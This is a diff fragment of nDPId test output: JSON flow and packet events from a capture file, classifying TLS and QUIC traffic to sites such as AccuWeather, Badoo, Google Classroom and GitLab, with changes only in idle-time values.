-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642584017659,"flow_last_seen":1642584017659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642584017659,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642584017659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017659,"pkt":"CL6sCxdumt9Y+uvcCABFAAA8EtFAAEAG2zrAqAypFwxoU5lQAbvzO0RFAAAAAKAC\/\/9KaQAAAgQFtAQCCApYVYYCAAAAAAEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642584017680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017680,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAADcG9wsXDGhTwKgMqQG7mVB1nT8a8ztERqAS\/ojzIwAAAgQFtAQCCAqw3vMWWFWGAgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642584017681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642584017681,"pkt":"CL6sCxdumt9Y+uvcCABFAAA0EtJAAEAG20HAqAypFwxoU5lQAbvzO0RGdZ0\/G4AQAKwfuAAAAQEIClhVhhew3vMW"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} 
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":315,"packets-processed":314,"total-skipped-flows":0,"total-l4-data-len":128021,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":66,"global_ts_msec":1643355518166} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":180000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1643355518166,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1643355518166,"pkt":"pJGxgjQ5SKRyNpegCABFAAT+PElAAIARThnAqAF72DrRLubeAbsE6urRwAAAAAEIZ7HskbOWr9QAAETQNKtjIjiCXCI+9vqBWPy31G7jDH4RlwYv0XhaWuj0UrdcSVWZIrVwzwDrJa8dEWOeUvaAw7BXeYev6bi8Nu9Z4LWOvt0+XPgNkeHB6PvaZ9N4cpB1UIRx6byg5QljaxCkgdia5\/WZz2yX\/TayWJG0egLwFK4DYqDDADilA59ewmPTSu6+F3\/EVfKw86o2Yio5HeQqtUOtEdw6pRwxBehgjTrZf0PMuk40XDPug94YB\/sEApD8Ghq1zUUVofn\/jZoji68n+CZ74BkmZ8LSaemosx3Vm7YV3yQUauQU4lBHNM2XdkooJSDGv9YINXu8hmpHdW\/1encLGdPSyOJC8itWve1maDbUaMRhrbQrpaAPeVfgND5alDCN2DMGvFe3nB6Pz2LOpDsj\/3ZN3caT5Nt0nSv8HN+DYWZc+2JmBlBY71FJ57bmTqruFnoZ\/GjM0BGxB5WlpJ0M3zE3M16k0p8WRYGK3bOkXFB5rtEix709VUri+WnB1ivvzP4A8iO977JvKVGlPddOYZ4k7qZne6v\/jb1y0P5AatOM7YYIeRI7u8jf\/xM8RY8UTL\/Pv+EQzBcgac+DyXJSt\/sJo+Uuz0dGCYpa4Aa01DbWUiA5x+j4g5WT5LGdKrytMkGgkIcVSlNAt4nWOQc2IroqJjfmf+NbusGe\/Gviz5jV93bOaTFv7sGyuvESP0iH2MD2mwPgizF6t5EabtXWaevGbit0evQ9O3bHeRpQwTlwh0hRD7WqrIf0Wri9spAJN53856UKZFRupvrVqTH40ht5wGl2g3HXmJvEKnWBsD1hEB3sacVd4lWjKim62JMTY6yUmMhRBlNu2AupnyFsChUJ1NgsRbg5cQPowXRIBVG8WcjCs7OHKUH\/zza5xjXEz1FrdKQASDLCvFyh9YUzlRmDx7d99nX5vf9AwJejikY1uel\/yRMHcT9IqYO0kZBeGiX2ZDJD7vD1sF+05Qq++ztAL3CTqhuU\/7KSbWKiGOoFGj9phj6fZiE+g9e7+HIVuvPAKr+aSbxS71gHelt+hKMcDj7jdDFk5P6TqQdUXfqrnN38RDusNZmvWB+23Sj9NvIjlpua1MtXRWVJaLY5mX9AL1kTENCHtxomZwiXSqkSWtzS8dZocOlqjfWrd2hnw5yl8b7T0843OsmN6ZOoho4X9bhFw\/52C+NFDBAC42\/6jsH2i4NdbJBqOAuf4tLWi3oaJ\/0r5Y0wWyVnBbFtq1sx6d6EHxqir52O50dkkD8SF7j+wGSCG2L1l5bcQGnAqpzpZNB8AgofMTbrgYgdYIyrh\/neffOlCQyXy2EgLb\/xWEt+QftF8p5n2FzevDADqTCGGVeWULgrEsb\/3qULNf4uZHaY4HBD6To7yTuITvaXdqFt30MJBKnhBexi0dhA\/MGpMyVJfR\/PhbhWZmiNdx\/LRAV2Semg\/nPWe+DzSBBXm7wJXZiE\/8ewkRVdkujJi\/QhXAX0aOL76X77YYeny\/V35WiIqUmuxRHrBRdP5AMMQo
\/adJoX4bzVdEvw3cGw7\/\/hO2VzwL5m0trABzWAWdjRjsrTEu\/mWAVCZDP5\/peoG8YXeXsdHWwpRLyNJpzOlRz5aND24Jgn5x2v3PqoD5RBiIEHwD8jlV2fRCZXq1e7tPV6eLhSI74="} 00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":180000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"},"quic": {"client_requested_server_name":"classroom.google.com","user_agent":"Chrome\/97.0.4692.99 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3","ja3":"a27a03a8478393fe7f8958648bb71ff4","tls_supported_versions":"TLSv1.3"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} 
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":316,"packets-processed":315,"total-skipped-flows":0,"total-l4-data-len":129271,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":1646482623895} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482623895,"flow_last_seen":1646482623895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482623895,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1646482623895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482623895,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8U5dAAEAGwa7AqAGAH95DcIjuAbuZU7+5AAAAAKAC+vB+rAAAAgQFtAQCCAqYsCyFAAAAAAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1646482623937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482623937,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADIGI04f3kNwwKgBgAG7iO5SHRbemVO\/uoASa9CRawAAAgQFUAEBBAIBAwMH"} -01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1646482623941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482623941,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItU5lAAEAGv7vAqAGAH95DcIjuAbuZU7+6Uh0W31AYAfZFAQAAFgMBAgABAAH8AwM7S+zQhzGHYgeM16HLoV5Lvv0qFp3\/Q9lLhcf6NGzgACCV4MycI1TbPUTQp0gTtBJdGxhCWPX0NxBb4Keh1UEhIQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuYmFkb28uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIDy\/wV7uHvn89KVxoNawBj6O\/1N7J\/Rv6ROuT\/L2i752ABcAQQR8rtiFUa3yYRs4u6Ro\/84M9BXHGtIJp6HdzCSQRE\/jjRMPOqb5+WU5M\/Rwa3rXtSAPp6MS0Mul28MptoKZ2BK0ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482623895,"flow_last_seen":1646482623895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482623895,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1646482623895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482623895,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8U5dAAEAGwa7AqAGAH95DcIjuAbuZU7+5AAAAAKAC+vB+rAAAAgQFtAQCCAqYsCyFAAAAAAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1646482623937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482623937,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADIGI04f3kNwwKgBgAG7iO5SHRbemVO\/uoASa9CRawAAAgQFUAEBBAIBAwMH"} 
+01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1646482623941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482623941,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItU5lAAEAGv7vAqAGAH95DcIjuAbuZU7+6Uh0W31AYAfZFAQAAFgMBAgABAAH8AwM7S+zQhzGHYgeM16HLoV5Lvv0qFp3\/Q9lLhcf6NGzgACCV4MycI1TbPUTQp0gTtBJdGxhCWPX0NxBb4Keh1UEhIQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuYmFkb28uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIDy\/wV7uHvn89KVxoNawBj6O\/1N7J\/Rv6ROuT\/L2i752ABcAQQR8rtiFUa3yYRs4u6Ro\/84M9BXHGtIJp6HdzCSQRE\/jjRMPOqb5+WU5M\/Rwa3rXtSAPp6MS0Mul28MptoKZ2BK0ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":180000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482634412,"flow_last_seen":1646482634412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482634412,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1646482634412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482634412,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ehBAAEAGVvPAqAGArEH7TtLuAburPYAuAAAAAKAC+vCVcQAAAgQFtAQCCAoaoTMuAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1646482634431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482634431,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkG2AusQftOwKgBgAG70u5kgyMxqz2AL4AS\/\/99tgAAAgQFeAEBBAIBAwMK"} 
-01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1646482634434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482634434,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItehJAAEAGVQDAqAGArEH7TtLuAburPYAvZIMjMlAYAfajwgAAFgMBAgABAAH8AwNOB4Gzi6+YArAvzkfwrorK9DEddM7BFl3e3mWx5EKfGSCorzDjbh21t2eWZKubSdOdkcLfUyHi+FUzEXYnC03sBQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA53d3cuZ2l0bGFiLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACA5FC8LVJQpX7CGnPMJyGCVSqmP\/UlOQqTKt4aSCzonPAAXAEEEf41WX9lKjs6LoM+3mxjeublwFG7G1\/kkw4gmsHPLzdToe\/hXlsiK3SyaMLeOC3M5q1ZNvI72xevTMYH\/wlBkVwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 